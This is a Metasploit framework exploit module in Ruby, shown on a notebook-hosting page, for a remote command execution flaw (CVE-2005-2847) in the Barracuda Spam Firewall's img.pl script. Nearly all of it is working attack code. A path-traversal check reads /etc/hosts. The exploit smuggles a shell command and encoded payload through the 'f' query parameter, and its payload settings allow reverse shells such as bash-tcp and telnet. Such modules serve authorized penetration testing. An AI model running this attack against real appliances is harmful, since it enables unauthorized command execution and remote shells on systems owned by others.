CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Barracuda IMG.PL Remote Command Execution',
15
      'Description'    => %q{
16
          This module exploits an arbitrary command execution vulnerability in the
17
        Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.
18
      },
19
      'Author'         => [ 'Nicolas Gregoire <ngregoire[at]exaprobe.com>', 'hdm' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          ['CVE', '2005-2847'],
24
          ['OSVDB', '19279'],
25
          ['BID', '14712'],
26
          ['URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19556']
27
        ],
28
      'Privileged'     => false,
29
      'Payload'        =>
30
        {
31
          'DisableNops' => true,
32
          'Space'       => 4000,
33
          'Compat'      =>
34
            {
35
              'PayloadType' => 'cmd cmd_bash',
36
              'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
37
            }
38
        },
39
      'Platform'       => 'unix',
40
      'Arch'           => ARCH_CMD,
41
      'Targets'        => [[ 'Automatic', { }]],
42
      'DisclosureDate' => '2005-09-01',
43
      'DefaultTarget' => 0))
44

45
    register_options(
46
      [
47
        OptString.new('URI', [true, "The full URI path to img.pl", "/cgi-bin/img.pl"]),
48
      ])
49
  end
50

51
  def check
52
    res = send_request_cgi({
53
      'uri'      => normalize_uri(datastore['URI']),
54
      'vars_get' =>
55
      {
56
        'f' => ("../" * 8) + "etc/hosts"
57
      }
58
    }, 25)
59

60
    if (res and res.body.match(/localhost/))
61
      return Exploit::CheckCode::Vulnerable
62
    end
63

64
    return Exploit::CheckCode::Safe
65
  end
66

67
  def exploit
68
    res = send_request_cgi({
69
      'uri'      => normalize_uri(datastore['URI']),
70
      'vars_get' =>
71
      {
72
        'f' => ("../" * 8) + %Q!bin/sh -c "echo 'YYY'; #{payload.encoded}; echo 'YYY'"|!
73
      }
74
    }, 25)
75

76
    if (res)
77
      print_status("The server returned: #{res.code} #{res.message}")
78
      print("")
79

80
      m = res.body.match(/YYY(.*)YYY/)
81

82
      if (m)
83
        print_status("Command output from the server:")
84
        print(m[1])
85
      else
86
        print_status("This server may not be vulnerable")
87
      end
88

89
    else
90
      print_status("No response from the server")
91
    end
92
  end
93
end
94

95